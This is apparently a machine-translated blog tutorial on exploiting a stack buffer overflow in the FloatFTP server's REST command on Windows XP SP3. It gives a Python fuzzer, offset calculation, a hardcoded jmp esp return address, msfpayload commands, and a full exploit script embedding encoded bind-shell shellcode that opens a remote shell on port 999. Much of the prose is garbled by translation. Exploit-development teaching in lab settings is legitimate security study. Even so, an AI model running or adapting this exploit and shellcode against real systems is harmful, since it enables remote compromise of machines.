Understanding how to exploit the Buffer Overflow Vulnerability

* This article is from a blog by an American information security researcher and consultant, translated by IDF volunteer Zhao Yang and proofread chapter.

When I had to deal with the buffer overflow vulnerability for the first time, I had nothing to know! Although I can build a network and configure a firewall and a proxy server, it is easy to use intrusion detection systems, but for the code, I was the first to come into use. However, just like dealing with any complicated or difficult concept, the best way is to break it into multiple parts we know.

After studying and learning the tutorial, some concepts and tools have become less confusing and we are gradually able to understand some details. Then, I started to find simple cache vulnerabilities in existing rebuild applications in the lab. Only by constantly experimenting, various concepts will appear one by one-the entire process, whether it is an independent part or the whole-will be presented a little.

This tutorial will describe some basic concepts for the defender, including the workload required by an attacker to go through the vulnerability development process and the risk of writing malicious code to attack specific vulnerabilities.

Today's attackers have both determination and technology, and know what practical operations are the most critical for those responsible for computers and networks. The more powerful defenders understand the motives and technologies of the enemy, the easier it is for him to develop effective defense measures.

I have to go through several stages of vulnerability mining to find a valid vulnerability. First, we will fuzz our target application and crash it in an interesting way, use the Immunity debugger to monitor the crash process and find the shellcode that is most vulnerable to attacks in the memory of the windows system. Then, we will create a vulnerability to pass shellcode to crisis remote systems.

Required Software/settings

• Attack System: Linux (R3 In My use)
• Development/victim system: windows xp sp3 English version
• Immunity debugger-installed on windows XP
• FloatFTP-the application we want to use (ignore existing vulnerabilities, click the "vulnerable application" button on this page to download and decompress the file to the desktop folder of the XP system ).

Let's get started!

Fuzzing

"Fuzzing" is a testing software for malformed, over-utilized, and sending random data to a computer program that attempts to cause system crashes or unexpected phenomena. Fuzzing is used to test system and program security.

Double-click float FTP to start execution:

Run the cmd prompt to run and listen to port 21 and type:

Netstat-an | find "21"

Start Immunity debugger, click "file", then click "attach", select the FTP server process, and click "attach ".

Once an application is loaded on the debugger, the debugger will be in a tentative state. Press the F9 key or the playing symbol on the Immunity debugger toolbar to run the application. The target application will be monitored by the debugger.

Now we will start to Configure FTP fuzzer. First, the Fuzz application will crash the system and then use the debugger to collect and analyze the crash data.

The following code is a simple FTP fuzzer written in the python script language. When executed, fuzzer sends the standard FTP command "REST ", and attaching more and more "A" to each command

#!/usr/bin/python import socket # Create an array of buffers, from 20 to 2000, with increments of 20. buffer=["A"] counter=20 while len(buffer) <= 30:         buffer.append("A"*counter)         counter=counter+100 # Define the FTP commands to be fuzzed commands=["REST"] # Run the fuzzing loop for command in commands:         for string in buffer:                 print "Fuzzing" + command + " with length:" +str(len(string))                  s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)                 connect=s.connect(('10.10.10.32',21)) # Target IP address                 s.recv(1024)                 s.send('USER ftp\r\n') # login user                 s.recv(1024)                 s.send('PASS ftp\r\n') # login password                 s.recv(1024)                 s.send(command + ' ' + string + '\r\n') # buffer                 s.recv(1024)                 s.send('QUIT\r\n')                 s.close()

 

From the example (http://www.exploit-db.com/exploits/17546/), we can know that the REST command of the FTP server is a vulnerable buffer overflow, and the REST function of FTP will become the target of fuzzer.

Create a folder on the desktop of the attack system to store fuzzing and vulnerability code. Run "nano fuzzer. py" in the directory using "CD ". In this case, a Blank nano text editor is opened, and the above Code is copied and pasted to the file.

Use the floatFTP IP system running on the system to change the target IP address, press CTRL + O to save the file, press CTRL + X to exit the nano, and then create an executable file by typing

Chmod 755 fuzzer. py

Run "/fuzzer. py". A few seconds later, you can see that fuzzer has stopped and the target application has crashed.

When you see this debugger on the XP system, you will see that the Immunity debugger has captured corrupted data and paused the application. If you look at the EIP (Extended Instruction Pointer) register, you will see the fuzzer buffer sending overwrite register within 41 seconds, and the fuzzer buffer will also flood into ESP (Extended Stack pointer) register (00AEFC2C ). Our primary goal is to control the EIP register again through the instruction code executed by the CPU and set it to our selected value.

Vulnerability Mining

Use nano to create a new file and enter the following code. This is the start of mining. Save the file as skeleton. py and run it (enter chmod 755 skeleton. py)

#!/usr/bin/python import socket s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  buffer = '\x41' * 1000 print "\nSending evil buffer..." s.connect(('10.10.10.32',21)) data = s.recv(1024) s.send('USER ftp' +'\r\n') data = s.recv(1024) s.send('PASS ftp' +'\r\n') data = s.recv(1024) s.send('REST' +buffer+'\r\n') s.close()

Run skeleton. py on the Linux terminal of the Attack System.

Now, when you check the EIP register on the Immunity debugger, you will see that the buffer code 4141414141 overwrites the register and overflows to the ESP register.

The next step is to determine the size of the space to insert code. So far, we have used a set of fixed repeated characters to determine the target memory address. Now we will use metasploit's pattern_create and pattern_offset tools to help us find out how much space we actually have and what specific memory address we target. First, use 1000 characters to generate a non-repeated string.

Run the cd command to/opt/metasploit/msf3/tools and run:

./Pattern_create.rb 1000

Create A 1000 character string to replace the 1000 character "A" in the previous Buffer Architecture vulnerability ".

Comment out the previous buffer vulnerabilities, and create a new buffer line as below, which is a new buffer in double quotation marks.

#!/usr/bin/python import socket s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  #buffer = '\x41' * 1000 buffer = "Paste pattern_create buffer here" print "\nSending evil buffer..." s.connect(('10.10.10.32',21)) data = s.recv(1024) s.send('USER ftp' +'\r\n') data = s.recv(1024) s.send('PASS ftp' +'\r\n') data = s.recv(1024) s.send('REST' +buffer+'\r\n') s.close()

 

Restart the FTP server under Immunity debugger (click "debug", then restart or press CTRL + F2) to start the FTP server architecture vulnerability. According to the previous practice, the EIP and ESP buffer must have a format created by metasploit. Copy these values, we will use them to calculate the differences between EIP and ESP registers in bytes.

In this example, the values of EIP and ESP are:

EIP: 69413269
ESP: 00AEFC2C (69413669)

Then run:

./Pattern_offset.rb 69413269

Next,./pattern_offset.rb 69413669.
The output tells us that the EIP register after 247 bytes is overwritten by the buffer, which means that the 248-251 bytes in the EIP are what we want.

The CPU uses the values in the EIP register to know the next command to run, and runs the current commands in the memory address, use the jmp esp command in the memory location of the EIP to enable the CPU to execute the command and "jump" to the ESP register to execute the command residing in the memory of the address. Our goal is to use the jmp esp command in the EIP so that we can control the execution of commands and convert our code into the ESP register.

There are 12 bytes between two registers, so we use 8 bytes to fill our buffer, narrow the gap and connect to the ESP register.

We use a framework vulnerability that maintains the 1000-byte boundary to adjust the buffer zone:

Buffer = "\ x41" * 247 + "\ x42 \ x42 \ x42 \ x42" + "\ x43" * 8 + "\ x44" * 741 z for example: [buffer] <> [eip data] <> [padding] <> [shellcode placeholder]

#!/usr/bin/python import socket s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) #buffer = x41 * 1000 #buffer = "pattern_create buffer" buffer = "\x41"*247 + "\x42\x42\x42\x42" + "\x43"*8 + "\x44"*741 print "\nSending evil buffer..." s.connect(('10.10.10.32',21)) data = s.recv(1024) s.send('USER ftp' +'\r\n') data = s.recv(1024) s.send('PASS ftp' +'\r\n') data = s.recv(1024) s.send('REST' +buffer+'\r\n') s.close()

 

Restart the FTP server in the Immunity debugger and press the pause key to cancel the suspended application.

Run the mining Task again, right-click the ESP register pane in the Immunity debugger, and select "follow in dump ". If everything is correctly arranged, the EIP registers will store 42424242 and DS (x44) will fill 8 CS in the space from EIP to ESP before the memory address of the ESP register.

Great. In the Immunity debugger, copy the memory address of the ESP from the beginning to the end of DS. Then open the windows Calculator, convert it to the hexadecimal mode, and convert the value to the hexadecimal value.

Here is the following:

Start: 00AEFC2C = 11467820

End: 00AEFF0C = 11468556

After the end value is subtracted from the start value 11468556-11467820 = 736, we know that there are 736 bytes to store the code.

Now that we have the target memory address and command, we need a way to get the command from the EIP register to the ESP register. To do this, we can use the existing jmp esp commands in windows operating system DLL.

Click "e" on the toolbar of the Immunity debugger, find the jmp esp command in the existing windows dll, double-click a DLL, right-click "Search", and select "command ", then type "jmp esp ".

We found the command in the windows System File kernel32.dll and wrote down the memory address of jmp esp. In this example, It is 7C86467B. Note that if you are using any other operating system, rather than the 32-bit windows xp sp3 English version, this command resides in different locations. If you are using another system, find the jmp esp command in another DLL and change the memory address in the remaining tutorial.

We use a new buffer to update our skeleton vulnerability, comment out the last buffer declaration, and replace it with the following code:

Buffer = "\ x41" * 247 + "\ x7B \ x46 \ x86 \ x7C" + "\ x42" * 8 + "\ xCC" * 741

Because of the small tail number CPU architecture, the jmp esp address must be formatted backward in the buffer, so 7C86467B is changed to \ x7B \ x46 \ x86 \ x7C. We also need to add 8 BS as the fill ("\ x43" * 8) and change the last value to \ xCC * 741 (742 CC's ), this will serve as a placeholder for our code. Everything works normally. CCs should start with the target ESP memory address, 00AEFC2C. We should find our jmp esp command (7C86467B) in the EIP register ).

#!/usr/bin/python import socket s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) #buffer = x41 * 1000 #buffer = "pattern_create buffer" #buffer = "\x41"*247 + "\x44\x44\x44\x44" + "\x43"*8 + "\x44"*741   # Windows XP SP3 kernel32.dll  JMP ESP buffer = "\x41"*247 + "\x7B\x46\x86\x7C" + "\x42"*8 + "\xCC"*741 print "\nSending evil buffer..." s.connect(('10.10.10.32',21)) data = s.recv(1024) s.send('USER ftp' +'\r\n') data = s.recv(1024) s.send('PASS ftp' +'\r\n') data = s.recv(1024) s.send('REST' +buffer+'\r\n') s.close()

In the Immunity debugger, after a single click on debug.exe, restart the ftbench ver.exe. Do not forget to press F9 or click the play button in the debugger to cancel the paused application.

On the Immunity debugger toolbar, click the three points pointed by the arrow to go To the jmp esp memory location: 7C86467B (in this example), and click "OK ", then press F2 to set the breakpoint in debugging. When accessing the jmp esp address, debugging will be tentative. Let's check the registers and verify the correctness of our target EIP and ESP.

Run the vulnerability again and view the output in the debugger, which looks like the following:

The EIP contains the target address (7C86467B) of jmp esp and our CCs starts at ESP (00AEFC2C. Now we control the execution of commands, and the rest is to replace the placeholder CCs with shellcode.

Shellcode and vulnerabilities

We will use msfpayload of metasploit to create payload. One thing to note: Because we all pass strings, we must abide by the character restrictions of the FTP protocol. This means that there is no blank, return, line feed, or @ symbol. They are represented as \ x00, \ x0d, \ x0a, 0 × 40 in hexadecimal notation. "\ X40 \ xff \ x3d \ x20" can block shellcode Execution.

The following is the shellcode created using the msfpayload command. When it is executed in the target system, the TCP999 port will be opened. The Msfencode statement ensures that there are no bad characters in the shellcode to prevent the above execution.

Msfpayload windows/shell_bind_tcp EXITFUNC = seh LPORT = 999 R | msfencode-B '\ x40 \ x0A \ x00 \ x0D \ xff \ x0d \ x3d \ x20'

The result is a 386-byte payload:

 

[*] x86/shikata_ga_nai succeeded with size 368 (iteration=1)  buf =  "\xba\x2e\x27\xc2\x55\xdb\xdc\xd9\x74\x24\xf4\x5f\x2b\xc9" +  "\xb1\x56\x31\x57\x13\x83\xef\xfc\x03\x57\x21\xc5\x37\xa9" +  "\xd5\x80\xb8\x52\x25\xf3\x31\xb7\x14\x21\x25\xb3\x04\xf5" +  "\x2d\x91\xa4\x7e\x63\x02\x3f\xf2\xac\x25\x88\xb9\x8a\x08" +  "\x09\x0c\x13\xc6\xc9\x0e\xef\x15\x1d\xf1\xce\xd5\x50\xf0" +  "\x17\x0b\x9a\xa0\xc0\x47\x08\x55\x64\x15\x90\x54\xaa\x11" +  "\xa8\x2e\xcf\xe6\x5c\x85\xce\x36\xcc\x92\x99\xae\x67\xfc" +  "\x39\xce\xa4\x1e\x05\x99\xc1\xd5\xfd\x18\x03\x24\xfd\x2a" +  "\x6b\xeb\xc0\x82\x66\xf5\x05\x24\x98\x80\x7d\x56\x25\x93" +  "\x45\x24\xf1\x16\x58\x8e\x72\x80\xb8\x2e\x57\x57\x4a\x3c" +  "\x1c\x13\x14\x21\xa3\xf0\x2e\x5d\x28\xf7\xe0\xd7\x6a\xdc" +  "\x24\xb3\x29\x7d\x7c\x19\x9c\x82\x9e\xc5\x41\x27\xd4\xe4" +  "\x96\x51\xb7\x60\x5b\x6c\x48\x71\xf3\xe7\x3b\x43\x5c\x5c" +  "\xd4\xef\x15\x7a\x23\x0f\x0c\x3a\xbb\xee\xae\x3b\x95\x34" +  "\xfa\x6b\x8d\x9d\x82\xe7\x4d\x21\x57\xa7\x1d\x8d\x07\x08" +  "\xce\x6d\xf7\xe0\x04\x62\x28\x10\x27\xa8\x5f\x16\xe9\x88" +  "\x0c\xf1\x08\x2f\xb1\xe6\x84\xc9\xdf\xf8\xc0\x42\x77\x3b" +  "\x37\x5b\xe0\x44\x1d\xf7\xb9\xd2\x29\x11\x7d\xdc\xa9\x37" +  "\x2e\x71\x01\xd0\xa4\x99\x96\xc1\xbb\xb7\xbe\x88\x84\x50" +  "\x34\xe5\x47\xc0\x49\x2c\x3f\x61\xdb\xab\xbf\xec\xc0\x63" +  "\xe8\xb9\x37\x7a\x7c\x54\x61\xd4\x62\xa5\xf7\x1f\x26\x72" +  "\xc4\x9e\xa7\xf7\x70\x85\xb7\xc1\x79\x81\xe3\x9d\x2f\x5f" +  "\x5d\x58\x86\x11\x37\x32\x75\xf8\xdf\xc3\xb5\x3b\x99\xcb" +  "\x93\xcd\x45\x7d\x4a\x88\x7a\xb2\x1a\x1c\x03\xae\xba\xe3" +  "\xde\x6a\xc4\x12\xd2\x66\x51\x8d\x87\xca\x3f\x2e\x72\x08" +  "\x46\xad\x76\xf1\xbd\xad\xf3\xf4\xfa\x69\xe8\x84\x93\x1f" +  "\x0e\x3a\x93\x35"

Comment out the previous buffer statement and add a new modification statement:

Buffer = "\ x41" * 247 + "\ x7B \ x46 \ x86 \ x7C" + "\ x42" * 8 + shellcode + "\ xCC" * 373 running in processing shellcode problem, after checking that all parameters include "bad characters", I decided to add the NOP command to the buffer before shellcode. In the CPU of a computer, a NOP slide is a series of NOP (no operation) commands (operation code 0 × 90 ), this means "sliding" the CPU command execution flow to its final goal. When everything is properly arranged in a vulnerability, the NOP command is advantageous, but the shellcode Execution fails. I added 16 NOP to the buffer before shellcode: buffer = "\ x41" * 247 + "\ x7B \ x46 \ x86 \ x7C" + "\ x42" * 8 + "\ x90" * 16 + shellcode + "\ xCC" * 357 for example: [buffer] <> [EIP-jmp esp] <> [EIP to ESP padding] <> [NOPs] <> [shellcode] <> [Padding]

Complete vulnerability:

#!/usr/bin/python import socket s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) #buffer = '\x41' * 1000 #buffer = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B" #buffer = "\x41"*247 + "\x42\x42\x42\x42" + "\x43"*8 + "\x44"*741 ## msfpayload windows/shell_bind_tcp EXITFUNC=seh LPORT=999 R | msfencode -b '\x40\x0A\x00\x0D' 368 bytes shellcode = ("\xba\x2e\x27\xc2\x55\xdb\xdc\xd9\x74\x24\xf4\x5f\x2b\xc9" "\xb1\x56\x31\x57\x13\x83\xef\xfc\x03\x57\x21\xc5\x37\xa9" "\xd5\x80\xb8\x52\x25\xf3\x31\xb7\x14\x21\x25\xb3\x04\xf5" "\x2d\x91\xa4\x7e\x63\x02\x3f\xf2\xac\x25\x88\xb9\x8a\x08" "\x09\x0c\x13\xc6\xc9\x0e\xef\x15\x1d\xf1\xce\xd5\x50\xf0" "\x17\x0b\x9a\xa0\xc0\x47\x08\x55\x64\x15\x90\x54\xaa\x11" "\xa8\x2e\xcf\xe6\x5c\x85\xce\x36\xcc\x92\x99\xae\x67\xfc" "\x39\xce\xa4\x1e\x05\x99\xc1\xd5\xfd\x18\x03\x24\xfd\x2a" "\x6b\xeb\xc0\x82\x66\xf5\x05\x24\x98\x80\x7d\x56\x25\x93" "\x45\x24\xf1\x16\x58\x8e\x72\x80\xb8\x2e\x57\x57\x4a\x3c" "\x1c\x13\x14\x21\xa3\xf0\x2e\x5d\x28\xf7\xe0\xd7\x6a\xdc" "\x24\xb3\x29\x7d\x7c\x19\x9c\x82\x9e\xc5\x41\x27\xd4\xe4" "\x96\x51\xb7\x60\x5b\x6c\x48\x71\xf3\xe7\x3b\x43\x5c\x5c" "\xd4\xef\x15\x7a\x23\x0f\x0c\x3a\xbb\xee\xae\x3b\x95\x34" "\xfa\x6b\x8d\x9d\x82\xe7\x4d\x21\x57\xa7\x1d\x8d\x07\x08" "\xce\x6d\xf7\xe0\x04\x62\x28\x10\x27\xa8\x5f\x16\xe9\x88" "\x0c\xf1\x08\x2f\xb1\xe6\x84\xc9\xdf\xf8\xc0\x42\x77\x3b" "\x37\x5b\xe0\x44\x1d\xf7\xb9\xd2\x29\x11\x7d\xdc\xa9\x37" "\x2e\x71\x01\xd0\xa4\x99\x96\xc1\xbb\xb7\xbe\x88\x84\x50" "\x34\xe5\x47\xc0\x49\x2c\x3f\x61\xdb\xab\xbf\xec\xc0\x63" "\xe8\xb9\x37\x7a\x7c\x54\x61\xd4\x62\xa5\xf7\x1f\x26\x72" "\xc4\x9e\xa7\xf7\x70\x85\xb7\xc1\x79\x81\xe3\x9d\x2f\x5f" "\x5d\x58\x86\x11\x37\x32\x75\xf8\xdf\xc3\xb5\x3b\x99\xcb" "\x93\xcd\x45\x7d\x4a\x88\x7a\xb2\x1a\x1c\x03\xae\xba\xe3" "\xde\x6a\xc4\x12\xd2\x66\x51\x8d\x87\xca\x3f\x2e\x72\x08" "\x46\xad\x76\xf1\xbd\xad\xf3\xf4\xfa\x69\xe8\x84\x93\x1f" "\x0e\x3a\x93\x35") ## Windows XP SP3 kernel32.dll 7C86467B JMP ESP #buffer = "\x41"*247 + "\x7B\x46\x86\x7C" + "\x42"*8 + "\xCC"*741 buffer = "\x41"*247 + "\x7B\x46\x86\x7C" + "\x42"*8 + "\x90"*16 + shellcode + "\xCC"*357 print "\nSending evil buffer..." s.connect(('10.10.10.32',21)) data = s.recv(1024) s.send('USER ftp' +'\r\n') data = s.recv(1024) s.send('PASS ftp' +'\r\n') data = s.recv(1024) s.send('REST' +buffer+'\r\n') s.close()

 

Disable the debugger on the XP system and restart FloatFTP. Start the vulnerability attack on the attack system and remotely connect to port 999 of the FTP server. Normally, you will be logged as an administrator (or any one that opens the FloatFTP process) receives a shell.

As you can see, the system has been infiltrated and controlled by attackers.